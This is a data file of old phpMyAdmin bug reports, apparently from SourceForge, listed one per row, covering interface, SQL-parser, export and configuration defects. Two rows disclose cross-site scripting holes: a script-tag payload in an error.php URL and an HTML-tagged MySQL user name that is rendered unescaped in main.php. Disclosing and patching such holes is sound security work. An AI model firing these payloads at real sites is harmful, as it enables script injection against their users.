"24444","8113","Can t NULL a column with a relation defined.
1\.
Create a table t1 with a column c1 of type int 2\.
Create a table t2 with a NULLABLE column c2 of type int 3\.
Insert a few records into t1 4\.
In Relationship View, refer t2.c2 gt; t1.c1 5\.
Insert a few records into t2.
6\.
Edit a record in t2, check NULL checkbox on c2 and try to save.
7\.
Saved value of c2 will be 0 and not NULL.
Original URL https sourceforge.net p phpmyadmin bugs 1747 https sourceforge.net p phpmyadmin bugs 1747 Original author wesha Found in version 3.1.1","bug"
"24444","8114","using mysqli extension with MySQL 4.0.x.
there is a check on an not initialized variable at line 147 in file mysqli.dbi.lib.php i cant provide a patch for this cause i dont know what is the intention behind this check or where this variable should came from.
on line 150 is also a not initialized variable name Original URL https sourceforge.net p phpmyadmin bugs 1748 https sourceforge.net p phpmyadmin bugs 1748 Original author cybot tm Found in version Latest Git","bug"
"24444","8115","Database list in the left pane doesn t get refreshed.
After dropping the database in the right pane, the Database combo box in the left pane is not refreshed.
Still the database name exists in the Database combo box.
Steps 1\.
Open the application 2\.
Click on Databases link in the right pane of the homepage.
3\.
Select any one of the existing database 4\.
Click on Drop Button Environment OS Windows XP Professional MySQL 4.0.24 Browser IE 6.0.2 Original URL https sourceforge.net p phpmyadmin bugs 1752 https sourceforge.net p phpmyadmin bugs 1752 Original author psvarma Found in version 2.6.1 pl3","bug"
"24444","8116","empty result set message not displayed.
Prerequisite Login to phpMyAdmin and open Privilages window by clicking on Privilages in Home page Test Steps 1\.
In SQL Query Window enter the SQL Command SELECT FROM user where user like a LIMIT 0 , 30 2\.
Click on Go Expected Result Should Display message No User Exist Actual Result No Proper error message handling.
Original URL https sourceforge.net p phpmyadmin bugs 1753 https sourceforge.net p phpmyadmin bugs 1753 Original author kavithareddy Found in version 2.6.1 pl3","bug"
"24444","8117","Uninitialized variable in Word export.
in htmlword.php on first line 284 is a call to an uninitilaized variable field name and i cant find any circumstance where this variable would be set!
Original URL https sourceforge.net p phpmyadmin bugs 1749 https sourceforge.net p phpmyadmin bugs 1749 Original author cybot tm","bug"
"24444","8118","User without database access can not run query.
I created a user without access to any database.
Then, in top left frame, clicked on SQL and then entered the query SELECT USER ) or others like that.
Regardless of cfg[ QueryFrameJS ] value, I couldn t get any result displayed.
Nothing happened with JS set to true, while with JS set to false, I returned to the main page again, after submitting the query.
This seems to happen in the CVS version as well, but I mainly tested with 2.6.3 pl1.
I am running PHP 5.0.4 and MySQL 4.1.12 mysqli).
Original URL https sourceforge.net p phpmyadmin bugs 1750 https sourceforge.net p phpmyadmin bugs 1750 Original author ci dev Found in version 2.6.3 pl1","bug"
"24444","8119","weird MySQL syntax error.
i have 3 systems, all running with latest CVS of phpMyAdmin Problems some styles doesnt seems to work, simple query like SELECT SEC TO TIME 500) FROM `table` brings syntax error, other Querys seems to work fine ... i treid so far disabling byte cache register globals on off fresh cvs of phpMyAdmin pls can someone take a look at the configuration of system 3, phpMyAdmin is a clean install in time, i will do further checks, and try the latest release of phpMyAdmin 2 of them running fine Windows XP SP 2 Apache 2.0.52 PHP 4.4.0 MySQL 5.0.10a 4.1.7 4.0.24 Fedora Core 4 dev Apache 2.0.54 Fedora) PHP 5.0.4 Fedora) Zend Platform 1.1.2b 1 making problems Red Hat 7.3 Apache 2.0.54 MySQL 4.1.13 MySQL rpms) PHP 4.3.11 Zend Platform 1.1.2b details PHP .
configure i386 redhat linux prefix= usr exec prefix= usr bindir= usr bin sbindir= usr sbin sysconfdir= etc datadir= usr share includedir= usr include libdir= usr lib libexecdir= usr libexec localstatedir= var sharedstatedir= usr com mandir= usr share man infodir= usr share info prefix= usr with config file path= etc with exec dir= usr bin disable cgi with png dir= usr with jpeg dir= usr with gd enable exif with png with regex=system with zlib with layout=GNU with pear= usr share pear enable track vars enable trans sid with mysql= usr enable memory limit with apxs2= usr sbin apxs enable mbstring Apache .
configure enable layout=RedHat enable file cache enable cache enable disk cache enable mem cache enable deflate enable logio enable mime magic enable so disable userdir enable speling enable rewrite disable imap enable dav fs enable cgi enable cgid enable dav disable include Original URL https sourceforge.net p phpmyadmin bugs 1751 https sourceforge.net p phpmyadmin bugs 1751 Original author cybot tm","bug"
"24444","8120","typo in german strConfigFileError.
... Konfigurationsdatei xc3xbcben den unteren ... should be ... Konfigurationsdatei xc3xbcber den unteren ...
Original URL https sourceforge.net p phpmyadmin bugs 1756 https sourceforge.net p phpmyadmin bugs 1756 Original author cybot tm Found in version Latest Git","bug"
"24444","8121","detect silent truncation.
1.In phpMyAdmin project open the database 2.OPen a table 3.click on sql tab 4.write the sql query INSERT INTO emp values uuuuuuuuuuuuuuu ,1,34); 4.See the message that successfully inserted 5.retreive the data 6.We see that only declared number of characters are taken Test Environment MySql 3.23.32 or higher Operating System windows xp Internet explorer 6.0 Original URL https sourceforge.net p phpmyadmin bugs 1754 https sourceforge.net p phpmyadmin bugs 1754 Original author lakshmiprasanna Found in version 2.6.1 pl3","bug"
"24444","8122","database drop down menu has extra spaces.
In the left hand frame, where the current database is listed in the drop down menu followed by a space and the number of tables for example, phpmyadmin 7) ), clicking any of the menu tabs in the right frame will cause an extra space to be inserted in to this string.
Do it enough and the number moves off the screen like phpmyadmin 7) and so on.
This seems to only be a problem with Internet Explorer, my Firefox does not display the extra spaces.
The seems to) problem exist in footer.inc.php version 2.15 does not do it, but version 2.16 does.
There was a change in how the display was generated, now it s done in JavaScript but my JavaScript and RegEx are a little rusty, so I ll leave the fix to the experts... Steps to reproduce load the main PMA page select a database from the drop down list pick Structure or SQL or so on from the right hand frame top row tabs see the extra space inserted as the left hand frame is refreshed again, my FF doesn t do this, it may be IE only).
Original URL https sourceforge.net p phpmyadmin bugs 1755 https sourceforge.net p phpmyadmin bugs 1755 Original author ibennetch Found in version Latest Git","bug"
"24444","8123","Unchecked PMA DBI get fields == FALSE.
First of all many thanks for contributing this great tool!
I am using phpMyAdmin 2.6.3 pl1 MySQL 5.0.11 beta nt PHP 5.1 beta 3 Windows NT 5.1 XP SP2) There comes a PHP error when I use following SQL statement.
SQL INSERT INTO forum rights SELECT node id, CAST SUBSTRING uid FROM 2 ) AS UNSIGNED ) AS user id, title right = owner AS owner FROM cpm forum rights LEFT JOIN forum nodes ON old id = title id ) WHERE node id IS NOT NULL AND uid != 0 ORDER BY node id MySQL reports 1062 Duplicate entry 1 417005 for key 1 Warning Invalid argument supplied for foreach ) in C \Programme\php\phpMyAdmin\libraries\common.lib.php on line 726 common.lib.php Line 725 tmp fields = PMA DBI get fields db, table, NULL); Line 726 foreach tmp fields as tmp field) \{ SQL table CREATE TABLE IF NOT EXISTS forum rights folder id MEDIUMINT 11) unsigned NOT NULL default 0 , user id MEDIUMINT 11) unsigned NOT NULL, owner TINYINT 1) unsigned NOT NULL default 0 , PRIMARY KEY title id folder id, user id)) ENGINE=MyISAM DEFAULT CHARSET=utf8; Keep up the good work, Renxc3xa9 Original URL https sourceforge.net p phpmyadmin bugs 1757 https sourceforge.net p phpmyadmin bugs 1757 Original author rele Found in version 2.6.3 pl1","bug"
"24444","8124","enum default value cannot be changed to .
If I create an enum field, with empty string) as one of the possible values, but some other string as the default value, I cannot change the default value back to empty using the interface.
If I try and do so, the query executed is ALTER TABLE `maps` CHANGE `test` `test` ENUM test , ) NOT NULL If I manually perform the expected query ALTER TABLE `maps` CHANGE `test` `test` ENUM test , ) DEFAULT NOT NULL is seems to work fine.
Thanks, Alex Original URL https sourceforge.net p phpmyadmin bugs 1758 https sourceforge.net p phpmyadmin bugs 1758 Original author alex summers Found in version 2.5.5 pl1","bug"
"24444","8125","Documentation on phpmyadmin.net is not updated.
The documentation at http www.phpmyadmin.net documentation is version 2.139, while CVS has 2.146 already.
In case there is no special reason for this, there is a bug in the web)server site documentation update script.
Original URL https sourceforge.net p phpmyadmin bugs 1759 https sourceforge.net p phpmyadmin bugs 1759 Original author ci dev Found in version Latest Git","bug"
"24444","8126","Parse error in config.inc.php results in silent death.
Any parse error in config.inc.php results in silent death of phpMyAdmin.
It took me a bit of time to figure that out.
This behavior is caused by the way common.lib.php handles configuration loading error reporting is set to 0, then restored to previous level after configuration loading.
Any error happenning in between is therefore hidden to the user, and loading stops.
I would suggest the use of include once cfg file to load) in place of the trick of disabling enabling error reporting in order to let the user catch eventual errors in their config.inc.php files.
Even if I personally think it s irrelevant, here is my configuration in case that would matter.
OS Linux 2.6.12 gentoo r6 x86) Apache 2.0.54 MySQL 5.0.15 beta PHP 5.1.0b3 Original URL https sourceforge.net p phpmyadmin bugs 1760 https sourceforge.net p phpmyadmin bugs 1760 Original author lordwo Found in version 2.6.3 pl1","bug"
"24444","8127","German umlauts broken in phpMyAdmin utf 8 issue).
Following change in config.inc.php makes problems cfg[ DefaultLang ] = german ; cfg[ Lang ] = de iso 8859 1 ; tested with php 4.4.0 see detailed informations in novell bugzilla https bugzilla.novell.com show bug.cgi?id=104600 Original URL https sourceforge.net p phpmyadmin bugs 1763 https sourceforge.net p phpmyadmin bugs 1763 Original author bruclik Found in version 2.6.3 pl1","bug"
"24444","8128","XSS in error.php.
[...] error.php?error= 3Cscript 3Ewindow.alert a ) 3C script 3E Original URL https sourceforge.net p phpmyadmin bugs 1761 https sourceforge.net p phpmyadmin bugs 1761 Original author nijel","bug"
"24444","8129","Strange query executed.
When I run query like SHOW TABLE STATUS FROM phpmyadmin I get following error SHOW CREATE TABLE `phpmyadmin`.`TABLES` 1146 Table phpmyadmin.TABLES doesn t exist I have no idea where this query came from.
Using MySQL 5.0.11, in command line query works without any problem.
Original URL https sourceforge.net p phpmyadmin bugs 1762 https sourceforge.net p phpmyadmin bugs 1762 Original author nijel Found in version Latest Git","bug"
"24444","8130","Wrong return page after an edit.
In current CVS we do not return to the calling page after an Edit.
It worked in 2.6.3 pl1.
Original URL https sourceforge.net p phpmyadmin bugs 1764 https sourceforge.net p phpmyadmin bugs 1764 Original author lem9 Found in version Latest Git","bug"
"24444","8131","Edit field No blank option for Attributes or Extra column.
When editing a field or fields in a table, the Extra and Attributes columns select boxes do not allow a blank value, forcing an unwanted attribute or auto increment on the field, either resulting in a query error when the table is updated or unwanted changes made to the tables field.
I assume this bug is not always reproducable... this bug would not fly under the radar as it severely hinders functionality of phpMyAdmin.
I do not know specifically how to reproduce it, however I have only had this problem on my gentoo box, first using the ebuild for phpMyAdmin 2.6.3 pl1 and now with the latest cvs checked out as of the date of this bug submission.
The attachment is an html dumb of the tbl alter frame.
You can clearly see no blank options in the specifield select tags.
Original URL https sourceforge.net p phpmyadmin bugs 1765 https sourceforge.net p phpmyadmin bugs 1765 Original author bgzee Found in version Latest Git","bug"
"24444","8132","SQL comments are not ignored from SQL textbox.
When I paste the output sql code of a phpMyAdmin export function, which contains SQL comments starting with and paste that code into the SQL text box that is, where you get when you click on SQL in the tab bar on top, after Structure), comments are not ignored but sent as query to the mysql server, which then complains about an invalid query.
If i upload on the same page an SQL file containing such comments, they are ignored as they should and MySQL doesn t complain.
How to Reproduce o Select a database and click on SQL on the right side, it s the second register card there.
o Paste the following SQL Code into the textbox on that page phpMyAdmin SQL Dump version 2.6.2 http www.phpmyadmin.net SELECT FROM xxx; Expected Result o Query SELECT FROM xxx should be executed without any error Actual Result o MySQL complains about the comment in the first line and doesn t execute the query Original URL https sourceforge.net p phpmyadmin bugs 1766 https sourceforge.net p phpmyadmin bugs 1766 Original author wagnerp Found in version 2.6.3 pl1","bug"
"24444","8133","multiple MAX FILE SIZE limits BLOB insertion.
If you have a table with for example) a TINYBLOB and a MEDIUMBLOB, both will generate a MAX FILE SIZE form entry in the insert feature in phpMyAdmin, but this will prevent larger thank 256b uploads for the MEDIUMBLOB.
At least, if the TINYBLOB comes first I haven t tried in reverse) example of offending code lt;input type= hidden name= MAX FILE SIZE value= 256 gt; lt;input type= hidden name= MAX FILE SIZE value= 65536 gt; Generates Warning MAX FILE SIZE of 256 bytes exceeded file [fields upload aMEDIUMBLOB[multi edit][0] =C \Windows\Desktop\picture.jpg] not saved in Unknown on line 0 Original URL https sourceforge.net p phpmyadmin bugs 1767 https sourceforge.net p phpmyadmin bugs 1767 Original author getid3 Found in version 2.6.3 pl1","bug"
"24444","8134","Field privs with db names containing underscores.
MySQL 4.0.24 max I don t think it s version specific though) I have a database named system authentication , a table called user data which contains a number of fields.
I log into PHPMyAdmin I click Privileges I click the edit button beside an existing user auth manager I select the database system authentication from the Add privileges on the following database select box.
I select the user data table from the Add privileges on the following table select box.
Now I only see the following User auth manager localhost Database auth\ manager Table user data Edit Privileges Table specific privileges Note MySQL privilege names are expressed in English Check All Uncheck All Data Structure Administration SELECT CREATE GRANT INSERT ALTER REFERENCES UPDATE INDEX DELETE DROP That s exactly the problem.
When I log in with any other database name, i.e.
say I rename the auth manager database to authmanager , then I get the full list that I want to see with all the fields that I can choose from the multiple select box.
Like User auth manager localhost Database authmanager Table user data Edit Privileges Table specific privileges Note MySQL privilege names are expressed in English SELECT INSERT UPDATE REFERENCES DELETE All the multiple select boxes are here.
Or None Or None Or None Or None CREATE DROP GRANT INDEX ALTER lt;SQL gt; CREATE TABLE `user data` `uid` INT 12 ) NOT NULL AUTO INCREMENT , `username` VARCHAR 12 ) NOT NULL , `password` VARCHAR 64 ) NOT NULL , PRIMARY KEY `uid` ) ) TYPE = MYISAM ; lt; SQL gt; Thank you, Matt Simpson Original URL https sourceforge.net p phpmyadmin bugs 1768 https sourceforge.net p phpmyadmin bugs 1768 Original author silentweb Found in version 2.6.3 pl1","bug"
"24444","8135","Incorrect info extraction for delete from subselect.
I know this is not really fair for the parser but actually it s a problem anyhow ... do SELECT `billingPeriodId` FROM `billingPeriods` WHERE `customerId` NOT IN SELECT `customerId` FROM customers ) LIMIT 0 , 30 try to mark and delete rows from the result from table billingPeriods results in DELETE FROM `customers` WHERE `billingPeriodId` =121 LIMIT 1 MySQL said Documentation 1054 Unknown column billingPeriodId in where clause = gt; table name is not correctly parsed in case a subselect is used Original URL https sourceforge.net p phpmyadmin bugs 1769 https sourceforge.net p phpmyadmin bugs 1769 Original author neufeind Found in version 2.6.3 pl1","bug"
"24444","8136","Possible wrong export of blob fields.
trying to export table with this structure CREATE TABLE IF NOT EXISTS `rss bet types` `site uid` int 4) NOT NULL default 0 , `bestbet id` int 4) NOT NULL default 0 , `bet title` varchar 32) default NULL, KEY `site uid` `site uid`,`bestbet id`) ) TYPE=MyISAM; here is a part of what i get as an export INSERT INTO `rss bet types` VALUES 14, 8 , xd1x84xd0xbexd1x80xd0xb02= gt;xd0xbaxd1x842); INSERT INTO `rss bet types` VALUES 14, 400003 , xd1x84xd0xbexd1x80xd0xb02= gt;xd0xbaxd1x842); INSERT INTO `rss bet types` VALUES 14, 400031 , xd1x84xd0xbexd1x80xd0xb02= gt;xd0xbaxd1x842); as you can see bet title values are not quoted.
Neither are they converted to hexadecimals while i tryied Use hexadecimal for binary fields option.
Original URL https sourceforge.net p phpmyadmin bugs 1770 https sourceforge.net p phpmyadmin bugs 1770 Original author xorax Found in version 2.6.4 rc1","bug"
"24444","8137","disadvantageously size of query window.
u must scrolling down to press the submit button.
a short !!)
view inside let me maybe find the reason at the resizing js function .
querframe.php).
OS winXP prof. SP2 BROWSER IE 6.0.29xx Original URL https sourceforge.net p phpmyadmin bugs 1771 https sourceforge.net p phpmyadmin bugs 1771 Original author elphp Found in version Latest Git","bug"
"24444","8138","grouping database with doesn t aways work.
phpmyadmin 2.6.4 rc1 database called nsx and one called nsx old it groups fine.
i.e the nsx in bold and indented underneath nsx and old) but when i add nsx2 cos it between nsx and nsx old alphabetically it breaks the grouping see the pic Original URL https sourceforge.net p phpmyadmin bugs 1772 https sourceforge.net p phpmyadmin bugs 1772 Original author scoles Found in version Latest Git","bug"
"24444","8139","Collation not kept while changing table field cnt.
Try to create table, fill in some values including collation.
When you now add some fields, collation value is lost.
Original URL https sourceforge.net p phpmyadmin bugs 1773 https sourceforge.net p phpmyadmin bugs 1773 Original author nijel Found in version Latest Git","bug"
"24444","8140","support of area ) function.
Description SELECT Area boundpath ) 526 AS Area km 2) FROM political unit, boundary WHERE unitname = Northern Ireland AND political unit.unitcode = boundary.unitcode LIMIT 0 , 30 MySQL said 1305 FUNCTION textbook.Area does not exist This works with the command line interface and MySQL Query browser.
textbook is the name of the database containing the tables.
How to repeat CREATE TABLE political unit unitname VARCHAR 30) not null, unitcode CHAR 2), unitpop DECIMAL 6,2), PRIMARY KEY unitcode)); CREATE TABLE boundary boundid INTEGER, boundpath POLYGON NOT NULL, unitcode CHAR 2), PRIMARY KEY boundid), CONSTRAINT fk boundary polunit FOREIGN KEY unitcode) REFERENCES political unit unitname)) TYPE MYISAM; CREATE TABLE city cityname VARCHAR 30), cityloc POINT NOT NULL, unitcode CHAR 2), PRIMARY KEY unitcode,cityname), CONSTRAINT fk city polunit FOREIGN KEY unitcode) REFERENCES political unit unitname)) TYPE MYISAM; INSERT INTO political unit VALUES Republic of Ireland , ie , 3.9); INSERT INTO political unit VALUES Northern Ireland , ni , 1.7); INSERT INTO boundary VALUES 1,GeomFromText polygon 9 8, 9 3, 4 1, 2 2, 1 3, 3 5, 3 6, 2 6, 2 9, 5 9, 5 10, 6 11, 7 11, 7 10, 6 9, 7 8, 7 9, 8 9, 8 8, 9 8)) ), ie ); INSERT INTO boundary VALUES 2,GeomFromText polygon 7 11, 9 11, 10 9, 10 8, 8 8, 8 9, 7 9, 7 8, 6 9, 7 10, 7 11)) ), ni ); INSERT INTO city VALUES Dublin ,GeomFromText POINT 9 6) ), ie ); INSERT INTO city VALUES Cork ,GeomFromText POINT 5 2) ), ie ); INSERT INTO city VALUES Limerick ,GeomFromText POINT 4 4) ), ie ); INSERT INTO city VALUES Galway ,GeomFromText POINT 4 6) ), ie ); INSERT INTO city VALUES Sligo ,GeomFromText POINT 5 8) ), ie ); INSERT INTO city VALUES Tipperary ,GeomFromText POINT 5 3) ), ie ); INSERT INTO city VALUES Belfast ,GeomFromText POINT 9 9) ), ni ); INSERT INTO city VALUES Londonderry ,GeomFromText POINT 7 10) ), ni ); Original URL https sourceforge.net p phpmyadmin bugs 1774 https sourceforge.net p phpmyadmin bugs 1774 Original author rtw30606","bug"
"24444","8141","XSS in main.php.
Hi, phpmyadmin latest version 2.6.4 rc1) is prone to a XSS in main.php when an username has HTML tags strange situation ) and the method to authenticate phpmyadmin is cookies.
Proof Create a new user in mysql database GRANT ALL PRIVILEGES on .
TO lt;h1 gt;hello lt; h1 gt; localhost IDENTIFIED by weakpass ; and authenticate you in phpmyadmin.
Patch html escape the string mysql cur user and host in the line 95 of main.php 95c95 lt; full string = str replace pma s3 , mysql cur user and host, full string); gt; full string = str replace pma s3 , htmlentities mysql cur user and host), full string); Original URL https sourceforge.net p phpmyadmin bugs 1775 https sourceforge.net p phpmyadmin bugs 1775 Original author jacobo es Found in version 2.6.4 rc1","bug"
"24444","8142","SHOW STATUS is rewritten to SHOW CREATE TABLE.
selecting any DB, f.e.
`mysql` and the SQL tab db details.php) submitting the sql SHOW STATUS reports Fehler SQL query SHOW CREATE TABLE `mysql`.`STATUS` MySQL said 1146 Table mysql.status doesn t exist Original URL https sourceforge.net p phpmyadmin bugs 1776 https sourceforge.net p phpmyadmin bugs 1776 Original author cybot tm Found in version Latest Git","bug"
"24444","8143","New themes don t work with pma 2.6.4 rc1 and 2.6.5 dev.
I ve downloaded the new version 2.1 themes and installed them into the theme directories of my pma 2.6.4 rc1 and 2.6.5 dev installations using Windows XP SP1, Apache 2.0.52, PHP 5.0.4).
But they don t show up on the main page in the Theme Style settings and can also not be set through config.inc.php to make another theme except original and darkblue orang the default.
Original URL https sourceforge.net p phpmyadmin bugs 1777 https sourceforge.net p phpmyadmin bugs 1777 Original author mpopp75 Found in version Latest Git","bug"
"24444","8144","ralation view.
im cannot fin button go in relation view innodb!
Original URL https sourceforge.net p phpmyadmin bugs 1779 https sourceforge.net p phpmyadmin bugs 1779 Original author gdimon Found in version 2.6.4","bug"
"24444","8145","No Save button in Relation view.
I ve just installed version 2.6.4 and noticed that when I open the file tbl relation.php there comes a view to the relations between tables but I can t find a save button, when I looked to the code I saw the start tag for form but couldn t find the end tag and no submit button either) Original URL https sourceforge.net p phpmyadmin bugs 1778 https sourceforge.net p phpmyadmin bugs 1778 Original author brainhead","bug"
"24444","8146","Does not change auto increment value.
When I go into a Table, click on the Operations Tab and change the auto increment value and press go it doesn t add the value to the query.
Thus not changing the auto increment value but I am able to change it manually through the sql command ALTER TABLE `table` PACK KEYS =1 CHECKSUM =0 DELAY KEY WRITE =0 AUTO INCREMENT =100 Original URL https sourceforge.net p phpmyadmin bugs 1780 https sourceforge.net p phpmyadmin bugs 1780 Original author bdeonline Found in version 2.6.4","bug"
"24444","8147","https export data export.php sql.
when i am login in secure channel 443 port https localhost phpmyadmin and export my data to .sql is not running and export.php saving .
but when login to to http localhost phpmyadmin not problem export is running.
Original URL https sourceforge.net p phpmyadmin bugs 1781 https sourceforge.net p phpmyadmin bugs 1781 Original author kidalabama Found in version 2.6.4 rc1","bug"
"24444","8148","auth type not filtrated.
If you set cfg[ Servers ][ i][ auth type ] = xxx ; in config.inc.php,you will get an error by php.It can t find file .
libraries auth xxx.auth.lib.php Original URL https sourceforge.net p phpmyadmin bugs 1782 https sourceforge.net p phpmyadmin bugs 1782 Original author semonxue Found in version 2.6.4","bug"
"24444","8149","Die without blowfish secret and cookie auth.
Latest cvs version die without cfg[ blowfish secret ] then cookie auth type used.
Fatal error mcrypt decrypt ) [function.mcrypt decrypt] Mcrypt initialisation failed in var www localhost htdocs phpMyAdmin libraries mcrypt.lib.php on line 90 Original URL https sourceforge.net p phpmyadmin bugs 1783 https sourceforge.net p phpmyadmin bugs 1783 Original author nullevent Found in version Latest Git","bug"
"24444","8150","Export compression default bzip instead of bzip2.
Behind cfg[ Export ][ compression ] on line 319 in config.inc.php there are 4 possible defaults mentioned none zip gzip bzip2 But in line 728 of display export.lib.php the value bzip is compared, not bzip2 PMA exportIsActive compression , bzip ); So one of these two places should be changed.
Keep up the good work, Renxc3xa9 Original URL https sourceforge.net p phpmyadmin bugs 1784 https sourceforge.net p phpmyadmin bugs 1784 Original author rele Found in version 2.6.4 pl1","bug"
"24444","8151","latest.txt no up to date.
Hi, http www.phpmyadmin.net latest.txt isn t up to date.
It refers to 2.6.3 pl1 wich isn t the latest stable release.
Auto update isn t possible because of this.
Thank you Original URL https sourceforge.net p phpmyadmin bugs 1785 https sourceforge.net p phpmyadmin bugs 1785 Original author jeremylecour Found in version 2.6.4 pl1","bug"
"24444","8152","Opera 8 DB dropdown resets after select.
.. when assigning a value to GET Parameter db I created different Opera 8.0) Sessions for different projects I work on.
For convenience, I assign a value to the GET Parameter db like myadmin index.php?
db=urgentproject) so I have the correct DB right after loading the session.
Problem Sometimes I have to switch to a different DB e. g. a temp or a backup DB) and when I do so, I can go there no problem BUT the dropdown jumps back to the original DB so due to no submit button) I canxc2xb4t return to my initial DB without reloading the whole frameset.
minor flaw with a simple workaround, but a bit unnerving nonetheless.
same behaviour in version 2.6.2 pl1.
works fine in 2.5.5 pl1.
Original URL https sourceforge.net p phpmyadmin bugs 1786 https sourceforge.net p phpmyadmin bugs 1786 Original author php sourcerer Found in version 2.6.4 pl1","bug"
"24444","8153","CHAR LENGTH 2.6.4 pl1.
SELECT FROM x WHERE CHAR LENGTH code) !=12 1305 FUNCTION deeep.CHAR LENGTH does not exist works in the command line, not in phpmyadmin kind regards Original URL https sourceforge.net p phpmyadmin bugs 1787 https sourceforge.net p phpmyadmin bugs 1787 Original author flobee","bug"
"24444","8154","Value from form is not used in query.
Table MyISAM, php 4.x, apache 1.x, mysql 4.0.x.
When changing table options on the bottom) I ve changed auto increment value to 6 .
It was initially 7 and after submiting changes I saw ALTER TABLE `tablename` PACK KEYS =1 CHECKSUM =0 DELAY KEY WRITE =0 AUTO INCREMENT = 7 and of course value was 7 like before).
As I see in sources tbl properties operations.php is calling.
Sorry, don t have time now to analize the problem.
Original URL https sourceforge.net p phpmyadmin bugs 1788 https sourceforge.net p phpmyadmin bugs 1788 Original author grew Found in version 2.6.4 pl1","bug"
"24444","8155","Not XHTML compliant.
For being XHTML compliant, I find it curious that multiple templates do not validate as valid XHTML.
Even HTML Tidy picks up on this problem.
For example In the frameset page Frameset proprietary attribute border, frameborder, framespacing, name Frame id and name value mismatch in the main.php page noscript isn t allowed in head elements link isn t allowed in noscript elements link isn t allowed in body elements meta isn t allowed in body elements discarding unexpected body div proprietary attribute name trimming empty noscript trimming empty option in db details structure.php noscript isn t allowed in head elements link isn t allowed in noscript elements link isn t allowed in body elements meta isn t allowed in body elements head isn t allowed in body elements discarding unexpected body unescape which should be written as amp;amp;amp; div proprietary attribute name trimming empty noscript If you re developing with the Firefox Mozilla browser, might I suggest installing this extension?
http users.skynet.be mgueury mozilla download.html Original URL https sourceforge.net p phpmyadmin bugs 1789 https sourceforge.net p phpmyadmin bugs 1789 Original author luegner Found in version 2.6.4 pl1","bug"
"24444","8156","Left frame is not refreshed when deleting a user.
If you delete a user and check the box that says Drop the databases that have the same names as the users , the user and the DB is deleted, but the DB list in the left frame is not refreshed.
You can reproduce the bug using the following steps Create a user called deletetest, and a DB called deletetest.
Then go to the privileges page, check the deletetest user, choose Delete the users and reload the privileges afterwards.
in the bottom, and check the box that says Drop the databases that have the same names as the users.
and click the Go butten.
As you can see the user and the DB is deleted, but the DB list is not refreshed.
I am using phpMyAdmin 2.6.4 pl1 along with php 5.0.5 and tested this in Firefox 1.0.4 and Opera 8.02.
Original URL https sourceforge.net p phpmyadmin bugs 1790 https sourceforge.net p phpmyadmin bugs 1790 Original author cogo","bug"
"24444","8157","Charset of export.
The database has one charset, and export of base turns out in another.
How to set the charset of export?
Original URL https sourceforge.net p phpmyadmin bugs 1791 https sourceforge.net p phpmyadmin bugs 1791 Original author yuriy apostol Found in version 2.6.4 pl1","bug"
"24444","8158","Passing empty values to strpos functions.
lots of php installations has the options mbstring.func overload in php.ini set to something usually 7).
This option makes PHP use Multi Byte mb functions when possible instead of single byte options.
This is important for unicode users.)
The problem is that PHP issue warnings for mb functions but not to normalm functions.
Note that this is a php bug and it will be corrected inthe future for non mb functions emit the same error.
Now when I first run phpmyadmin, I get this errors Warning mb strrpos ) Empty haystack in var www phpmyadmin libraries auth cookie.auth.lib.php on line 455 Warning mb strrpos ) Empty haystack in var www phpmyadmin libraries auth cookie.auth.lib.php on line 83 Warning Cannot modify header information headers already sent by output started at var www phpmyadmin libraries auth cookie.auth.lib.php 455) in var www phpmyadmin libraries auth cookie.auth.lib.php on line 106 Warning Cannot modify header information headers already sent by output started at var www phpmyadmin libraries auth cookie.auth.lib.php 455) in var www phpmyadmin libraries select theme.lib.php on line 93 Besides being ugly, if cookie or http auth is used, it wont work as the http headers have being sent.
solution PHPMYADMIN HAVE TO CHECK IF VARIABLES ARE NOT EMPTY BEFORE USING THIS FUNCTIONS.
or use function to keep errors and bugs) hidden ) I know that you guys are aware of the problem and overload is not supported.
However, future versions of php will issue warnings for non mb functions.
So this has to be handled.
good work.
Original URL https sourceforge.net p phpmyadmin bugs 1792 https sourceforge.net p phpmyadmin bugs 1792 Original author rsd Found in version 2.6.4 pl1","bug"
"24444","8159","Wrong name pdf file if page name contains spaces.
The page name is used in the file name sent to the browser.
If this page name contains one or more spaces these are sent in the name to the browser.
The browser will use only the part before the space as name which doesn t contain .pdf .
So the page isn t displayed.
Original URL https sourceforge.net p phpmyadmin bugs 1793 https sourceforge.net p phpmyadmin bugs 1793 Original author marceln Found in version 2.6.4 pl1","bug"
"24444","8160","CSV on screen Export broken.
Trying to export using non MS Excel CSV format gives some weird output such as 9402 lt;span class= separator gt; lt;img src= .
themes original img item ltr.png width= 5 height= 9 alt= gt; lt; span gt; R 00 lt;span class= separator gt; lt;img src= .
themes original img item ltr.png width= 5 height= 9 alt= gt; lt; span gt; 2 lt;span class= separator gt; lt;img src= .
themes original img item ltr.png width= 5 height= 9 alt= gt; lt; span gt; Dunno if the lt; gt; will get through the form, still this is annoying, and the bug is not in 2.6.2 pl1 Original URL https sourceforge.net p phpmyadmin bugs 1794 https sourceforge.net p phpmyadmin bugs 1794 Original author gilou epik Found in version 2.6.4 pl1","bug"
"24444","8161","Privileges tab on database.
That tab is totally confusing as it changes tabs to server one.
It either should not be a tab or link should keep database tabs.
Original URL https sourceforge.net p phpmyadmin bugs 1795 https sourceforge.net p phpmyadmin bugs 1795 Original author nijel Found in version Latest Git","bug"
"24444","8162","Changing of auto increment value on working.
When i select a table and then click Operations and goto table options and try to change auto increment value it not working for me Please suggest if a am wrong in operating phpMyAdmin or some problem with phpMyAdmin version this problem was not on my previous version ie 2.6.2 Original URL https sourceforge.net p phpmyadmin bugs 1797 https sourceforge.net p phpmyadmin bugs 1797 Original author send2ashish Found in version 2.6.4 pl1","bug"
"24444","8163","PHP error message on empty queries.
A multiple SQL query including a line only consisting of a single colon ; produces the following errors Notice Undefined index len in libraries\sqlparser.lib.php on line 1936 Notice Undefined offset 0 in libraries\sqlparser.lib.php on line 1946 Best regards, Renxc3xa9 Original URL https sourceforge.net p phpmyadmin bugs 1796 https sourceforge.net p phpmyadmin bugs 1796 Original author rele Found in version 2.6.4 pl1","bug"
"24444","8164","Auto increment issue.
Good day, Table structure export still includes the auto increment value even if it is left unchecked on the options form prior to submitting.
Terry Original URL https sourceforge.net p phpmyadmin bugs 1799 https sourceforge.net p phpmyadmin bugs 1799 Original author finian 826 Found in version 2.6.4 pl1","bug"
"24444","8165","CONSTRAINTS in a field name messes up export.
